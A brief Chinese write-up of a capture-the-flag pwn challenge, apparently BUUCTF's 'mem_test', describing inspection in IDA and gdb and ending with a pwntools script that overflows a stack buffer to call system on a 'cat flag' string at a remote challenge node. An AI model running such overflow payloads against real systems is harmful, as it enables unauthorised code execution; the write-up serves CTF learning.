国际惯例
Ida
没啥问题,去看看mem_test函数有没有问题。
NX还有栈溢出难道是ROP?还是gdb看看hint是啥吧。
哦豁!
哦豁!
那这样思路有了栈溢出system执行catflag。
from pwn import*
r=remote("node3.buuoj.cn",27175)
system_addr = 0x08048440
catflag_addr = 0x080487E0
payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)
r.sendline(payload)
r.interactive()